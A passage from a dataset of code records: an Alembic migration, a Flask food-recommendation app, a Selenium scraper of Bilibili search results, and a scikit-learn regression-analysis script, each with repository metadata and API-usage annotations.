"attribute"}, {"api_name": "typing.Optional", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 209, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 210, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 202, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 240, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 263, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 264, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 266, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 267, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 261, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 261, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 295, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 294, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 294, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 294, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 310, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 309, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 309, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 309, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 325, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 324, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 324, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 324, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 358, "usage_type": "call"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 342, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 342, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 368, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 415, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 442, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 442, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 443, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 451, "usage_type": "call"}, {"api_name": "asyncio.Event", "line_number": 452, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": "call"}, {"api_name": 
"discord.Guild", "line_number": 462, "usage_type": "attribute"}, {"api_name": "discord.utils.get", "line_number": 464, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 464, "usage_type": "name"}, {"api_name": "discord.HTTPException", "line_number": 468, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 484, "usage_type": "call"}, {"api_name": "discord.CategoryChannel", "line_number": 503, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 504, "usage_type": "name"}, {"api_name": "bot.common.extension_setup", "line_number": 528, "usage_type": "call"}]}
+{"seq_id": "15800119886", "text": "\"\"\"add tables\n\nRevision ID: d2615228dcac\nRevises: 32505b1f2d53\nCreate Date: 2023-05-04 08:52:41.545752\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2615228dcac'\ndown_revision = '32505b1f2d53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('text', sa.String(length=255), nullable=False),\n sa.Column('author', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post_user_likes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.UUID(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('post_user_likes')\n op.drop_table('post')\n # ### end Alembic commands ###\n", "repo_name": "AVyha/social_network", "sub_path": "alembic/versions/d2615228dcac_add_tables.py", "file_name": "d2615228dcac_add_tables.py", "file_ext": "py", "file_size_in_byte": 1206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.UUID", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "71127997289", "text": "from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef Home():\n if request.method == 'POST':\n model = pickle.load(open('food_recommendation_model.pkl', 'rb'))\n calories = float(request.form[\"calories\"])\n carbohydrates = float(request.form['carbohydrates'])\n fats = float(request.form['fats'])\n protein = float(request.form['protein'])\n\n Measure = 0.25\n Grams = 1\n Calories = calories\n Protein = protein\n Fat = fats\n Sat_Fat = 0.102564103\n Fiber = 0.0\n Carbs = carbohydrates\n\n input_data = pd.DataFrame({\n 'Measure': [Measure],\n 'Grams': [Grams],\n 'Calories': [Calories],\n 'Protein': [Protein],\n 'Fat': [Fat],\n 'Sat.Fat': [Sat_Fat],\n 'Fiber': [Fiber],\n 'Carbs': [Carbs]\n })\n\n prediction = model.predict(input_data)\n\n food_dict = {\n 1: 'Breads, cereals, fastfood,grains (e.g., bread, rice, pasta)',\n 2: 'Meat, Poultry (e.g., chicken, beef, pork)',\n 3: 'Desserts, sweets (e.g., cookies, cakes, candies)',\n 4: 'Dairy products (e.g., milk, cheese, yogurt)',\n 5: 'Vegetables A-E (e.g., asparagus, broccoli, carrots)',\n 6: 'Vegetables R-Z (e.g., radishes, zucchini, squash)',\n 7: 'Fruits G-P (e.g., grapes, oranges, peaches)',\n 8: 'Fruits A-F (e.g., apples, bananas, cherries)',\n 9: 'Fish, Seafood (e.g., salmon, shrimp, tuna)',\n 10: 'Fats, Oils, Shortenings (e.g., butter, olive oil, lard)',\n 11: 'Vegetables F-P (e.g., fennel, lettuce, peppers)',\n 12: 'Seeds and Nuts (e.g., almonds, peanuts, sunflower seeds)',\n 13: 'Drinks,Alcohol, Beverages (e.g., water, soda, wine)',\n 14: 'Soups (e.g., chicken soup, tomato soup, vegetable soup)',\n 15: 'Fruits R-Z (e.g., raspberries, strawberries, watermelon)',\n 16: 'Jams,Jellies (e.g., strawberry jam, grape jelly, marmalade)'\n }\n\n if prediction[0] in food_dict:\n print(prediction[0])\n recommended_food_category = food_dict[prediction[0]]\n result = f\"The recommended food category is: {recommended_food_category}\"\n else:\n result = \"Sorry, we are not able to recommend a proper food category for this environment.\"\n\n # user_input = [Measure,Grams,Calories,Protein,Fat,Sat.Fat,Fiber,Carbs]\n # user_input = [0.25, 0.991, 0.665322581, 0.141630901,\n # 0.17167382, 0.153846154, 0, 0.203389831]\n\n result_html = process_user_input(result)\n\n return result_html\n return render_template('index.html')\n\n\ndef process_user_input(result):\n # Replace this with your actual data processing logic\n\n # Generate HTML for the results\n # result_html = ''\n # for item in result:\n # result_html += f'{item} '\n # result_html += ' '\n\n return ''+result+'
'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Riya2812/NFC_CodeRunners", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "29960524565", "text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport xlwt\nimport bs4\nfrom selenium.webdriver.chrome.options import Options\n\n# 浏览器初始化\noptions = Options()\noptions.add_argument('--headless')\nbrowser=webdriver.Chrome(options=options)\nWAIT=WebDriverWait(browser,10)\nbrowser.set_window_size(1400, 900)\nbrowser.get('https://www.bilibili.com/')\n\n# 数据库初始化\n\ndef searchB(src):\n\n # 表格初始化(仅用于表格储存信息模式)\n book = xlwt.Workbook(src, style_compression=0)\n sheet = book.add_sheet(src, cell_overwrite_ok=True)\n sheet.write(0, 0, '名称')\n sheet.write(0, 1, '地址')\n sheet.write(0, 2, '描述')\n sheet.write(0, 3, '观看次数')\n sheet.write(0, 4, '弹幕数')\n sheet.write(0, 5, '发布时间')\n sheet.write(0, 6, 'Up主')\n n = 1\n\n\n def search():\n try:\n print(\"开始尝试访问b站...\")\n input = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#nav_searchform > input\")))\n submit = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#nav_searchform > div > button')))\n\n input.send_keys(src)\n submit.click()\n\n print(\"搜索成功,转到新窗口\")\n all_h = browser.window_handles\n browser.switch_to.window(all_h[1])\n getPage()\n\n total = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.last > button'))).text\n print('总页数为' + total)\n return int(total)\n except TimeoutException:\n print('访问超时,尝试重新访问...')\n return search()\n\n def getPage():\n WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#all-list > div.flow-loader > div.filter-wrap')))\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, 'lxml')\n save_data_to_excel(soup)\n\n def save_data_to_excel(soup):\n list = soup.find(class_='video-list clearfix').find_all(class_='video-item matrix')\n for item in list:\n item_title = item.find('a').get('title')\n item_link = item.find('a').get('href')\n item_des = item.find(class_='des hide').text.strip()\n item_playtime = item.find(class_='so-icon watch-num').text.strip()\n if item_playtime.endswith('万'):\n item_playtime=float(item_playtime[:-1])*1000\n item_playtime=int(item_playtime)\n item_subtitle = item.find(class_='so-icon hide').text.strip()\n if item_subtitle.endswith('万'):\n item_subtitle=float(item_subtitle[:-1])*1000\n item_subtitle=int(item_subtitle)\n item_time = item.find(class_='so-icon time').text.strip()\n item_up = item.find(class_='up-name').text\n\n print(\"读取 | \" + item_title)\n nonlocal n\n\n sheet.write(n, 0, item_title)\n sheet.write(n, 1, item_link)\n sheet.write(n, 2, item_des)\n sheet.write(n, 3, item_playtime)\n sheet.write(n, 4, item_subtitle)\n sheet.write(n, 5, item_time)\n sheet.write(n, 6, item_up)\n\n n += 1\n\n def next_page(des_page):\n try:\n print('读取下一页...')\n next_btn = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.next > button')))\n next_btn.click()\n WAIT.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.active > button'),\n str(des_page)))\n getPage()\n except TimeoutException:\n print('访问超时,尝试刷新中...')\n browser.refresh()\n next_page(des_page)\n\n total = search()\n\n for i in range(2, total + 1):\n next_page(i)\n\n browser.close()\n\n # 保存表格(仅用于表格存储时)\n 
book.save(src+'.xls')\n\nif __name__ == '__main__':\n    src=input(\"Enter a search query: \")\n    searchB(src)", "repo_name": "jingjiecb/PythonSpider", "sub_path": "learn/selenium/bilibili.py", "file_name": "bilibili.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 58, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 96, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 96, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 99, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", 
"line_number": 99, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 103, "usage_type": "name"}]}
+{"seq_id": "31314452787", "text": "import sys, datetime, pdb, time\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import Ridge, ElasticNet, Lasso\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils.ml_utils import plot_decision_regions, standardize, IMG_PATH, lin_regplot\nfrom algorithms.linear_regression_gd import LinearRegressionGD\n\n\n\ndef heat_map(df, xcols):\n y = df['target']\n X = df[list(xcols)]\n cols = ['target_proxy'] + list(xcols)\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n sns.set(style='whitegrid', context='notebook') \n sns.pairplot(df[cols], size=2.5) \n plt.tight_layout() \n plt.savefig(IMG_PATH + 'corr_mat.png', dpi=300)\n plt.close()\n \n cm = np.corrcoef(df[cols].values.T)\n sns.set(font_scale=1.5)\n hm = sns.heatmap(cm, \n cbar=True,\n annot=True, \n square=True,\n fmt='.2f',\n annot_kws={'size': 15},\n yticklabels=cols,\n xticklabels=cols)\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'heat_map.png', dpi=300)\n plt.close()\n \ndef linear_regressor(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegressionGD()\n lr.fit(np.transpose(np.array([X_train])), y_train)\n plt.plot(range(1, lr.n_iter+1), lr.cost_)\n plt.ylabel('SSE')\n plt.xlabel('Epoch')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'cost.png', dpi=300)\n plt.close()\n \n lin_regplot(np.transpose(np.array([X_train])), y_train, lr)\n plt.savefig(IMG_PATH + 'lin_reg_cost.png', dpi=300)\n plt.close()\n \n # Find the average return of a stock with PE = 20\n # Note: will give odd results if x values are standardized and input is not\n y_val_std = lr.predict([20.0])\n print(\"Estimated Return: %.3f\" % y_val_std)\n print('Slope: %.3f' % lr.w_[1])\n print('Intercept: %.3f' % lr.w_[0])\n\ndef linear_regression_sklearn(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n X = np.transpose(np.array([X])) \n slr = LinearRegression()\n slr.fit(X, y.values)\n y_pred = slr.predict(X)\n print('Slope: %.3f' % slr.coef_[0])\n print('Intercept: %.3f' % slr.intercept_)\n \n lin_regplot(X, y.values, slr)\n plt.xlabel('x val')\n plt.ylabel('Return')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'scikit_lr_fit.png', dpi=300)\n plt.close()\n\n # Closed-form solution\n Xb = np.hstack((np.ones((X.shape[0], 1)), X))\n w = np.zeros(X.shape[1])\n z = np.linalg.inv(np.dot(Xb.T, Xb))\n w = np.dot(z, 
np.dot(Xb.T, y))\n print('Slope: %.3f' % w[1])\n print('Intercept: %.3f' % w[0])\n \ndef ransac(df, xcols):\n # function to deal with outliers\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=50, \n residual_metric=lambda x: np.sum(np.abs(x), axis=1), \n residual_threshold=5.0, \n random_state=0)\n \n ransac.fit(X, y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n line_X = np.arange(3, 10, 1)\n line_y_ransac = ransac.predict(line_X[:, np.newaxis])\n plt.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n plt.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers')\n plt.plot(line_X, line_y_ransac, color='red') \n plt.xlabel('x-val')\n plt.ylabel('Returns')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'ransac_fit.png', dpi=300)\n plt.close()\n \ndef polynomial_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegression()\n pr = LinearRegression()\n quadratic = PolynomialFeatures(degree=2)\n X_quad = quadratic.fit_transform(X)\n # fit linear features\n lr.fit(X, y)\n X_fit = np.arange(-2,50,1)[:, np.newaxis]\n y_lin_fit = lr.predict(X_fit)\n \n # fit quadratic features\n pr.fit(X_quad, y)\n y_quad_fit = pr.predict(quadratic.fit_transform(X_fit))\n \n # plot results\n plt.scatter(X, y.values, label='training points')\n plt.plot(X_fit, y_lin_fit, label='linear fit', linestyle='--')\n plt.plot(X_fit, y_quad_fit, label='quadratic fit')\n plt.legend(loc='best')\n \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'poly_regression.png', dpi=300)\n plt.close()\n \n y_lin_pred = lr.predict(X)\n y_quad_pred = pr.predict(X_quad)\n print('Training MSE linear: %.3f, quadratic: %.3f' % ( \n mean_squared_error(y, y_lin_pred), \n mean_squared_error(y, y_quad_pred))) \n print('Training R^2 linear: %.3f, quadratic: %.3f' % ( \n r2_score(y, y_lin_pred), \n r2_score(y, y_quad_pred)))\n\ndef nonlinear(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n regr = LinearRegression() \n \n # create quadratic features \n quadratic = PolynomialFeatures(degree=2) \n cubic = PolynomialFeatures(degree=3) \n X_quad = quadratic.fit_transform(X) \n X_cubic = cubic.fit_transform(X) \n \n # fit features \n X_fit = np.arange(X.min(), X.max(), 1)[:, np.newaxis] \n \n regr = regr.fit(X, y) \n y_lin_fit = regr.predict(X_fit) \n linear_r2 = r2_score(y, regr.predict(X)) \n \n regr = regr.fit(X_quad, y) \n y_quad_fit = regr.predict(quadratic.fit_transform(X_fit)) \n quadratic_r2 = r2_score(y, regr.predict(X_quad)) \n \n regr = regr.fit(X_cubic, y) \n y_cubic_fit = regr.predict(cubic.fit_transform(X_fit)) \n cubic_r2 = r2_score(y, regr.predict(X_cubic)) \n \n \n # plot results \n plt.scatter(X, y, label='training 
points', color='lightgray') \n    \n    plt.plot(X_fit, y_lin_fit, \n             label='linear (d=1), $R^2=%.2f$' % linear_r2, \n             color='blue', \n             lw=2, \n             linestyle=':') \n    \n    plt.plot(X_fit, y_quad_fit, \n             label='quadratic (d=2), $R^2=%.2f$' % quadratic_r2, \n             color='red', \n             lw=2, \n             linestyle='-') \n    \n    plt.plot(X_fit, y_cubic_fit, \n             label='cubic (d=3), $R^2=%.2f$' % cubic_r2, \n             color='green', \n             lw=2, \n             linestyle='--') \n    \n    plt.xlabel('x-val') \n    plt.ylabel('Return') \n    plt.legend(loc='best') \n    plt.tight_layout()\n    plt.savefig(IMG_PATH + 'nonlinear_regr.png', dpi=300)\n    plt.close()\n    \n    pdb.set_trace()\n    # transform features\n    X_log = np.log(X)\n    y_sqrt = np.sqrt(y)\n    \n    # fit features\n    X_fit = np.arange(X_log.min()-1, X_log.max()+1, 1)[:, np.newaxis]\n    regr = regr.fit(X_log, y_sqrt)\n    y_lin_fit = regr.predict(X_fit)\n    linear_r2 = r2_score(y_sqrt, regr.predict(X_log))\n    \n    # plot results\n    plt.scatter(X_log, y_sqrt, label='training points', color='lightgray')\n    plt.plot(X_fit, y_lin_fit, \n             label='linear (d=1), $R^2=%.2f$' % linear_r2, \n             color='blue', \n             lw=2)\n    \n    plt.xlabel('x-val')\n    plt.ylabel('Return')\n    plt.legend(loc='best')\n    plt.tight_layout()\n    plt.savefig(IMG_PATH + 'sqrt_log.png', dpi=300)\n\ndef random_forest_regression(df, xcols):\n    y = df['target_proxy']\n    X = df[list(xcols)[0]]\n    X = np.transpose(np.array([X]))\n    \n    # Standardize and split the training and test data\n    X_std = standardize(X)\n    ts = 0.3\n    X_train, X_test, y_train, y_test = \\\n        train_test_split(X_std, y, test_size=ts, random_state=0)\n    \n    tree = DecisionTreeRegressor(max_depth=3)\n    tree.fit(X, y)\n    sort_idx = X.flatten().argsort()\n    lin_regplot(X[sort_idx], y[sort_idx], tree)\n    plt.xlabel('x-val')\n    plt.ylabel('Return')\n    plt.savefig(IMG_PATH + 'tree_regression.png', dpi=300)\n    plt.close()\n    \n    forest = RandomForestRegressor(n_estimators=1000, \n                criterion='mse', \n                random_state=1, \n                n_jobs=-1)\n    forest.fit(X_train, y_train)\n    y_train_pred = forest.predict(X_train)\n    y_test_pred = forest.predict(X_test)\n    print('MSE train: %.3f, test: %.3f' % (\n        mean_squared_error(y_train, y_train_pred),\n        mean_squared_error(y_test, y_test_pred)))\n    print('R^2 train: %.3f, test: %.3f' % (\n        r2_score(y_train, y_train_pred),\n        r2_score(y_test, y_test_pred)))\n    \n    plt.scatter(y_train_pred, \n                y_train_pred - y_train, \n                c='black', \n                marker='o', \n                s=35, \n                alpha=0.5, \n                label='Training data') \n    plt.scatter(y_test_pred, \n                y_test_pred - y_test, \n                c='lightgreen', \n                marker='s', \n                s=35, \n                alpha=0.7, \n                label='Test data') \n    plt.xlabel('Predicted values') \n    plt.ylabel('Residuals') \n    plt.legend(loc='best') \n    plt.hlines(y=0, xmin=-10, xmax=50, lw=2, color='red') \n    plt.xlim([-10, 50]) \n    plt.tight_layout()\n    plt.savefig(IMG_PATH + 'slr_residuals.png', dpi=300)", "repo_name": "mccarvik/python_for_finance", "sub_path": "research/ml_analysis/scripts/continuous_variables.py", "file_name": "continuous_variables.py", "file_ext": "py", "file_size_in_byte": 11348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", 
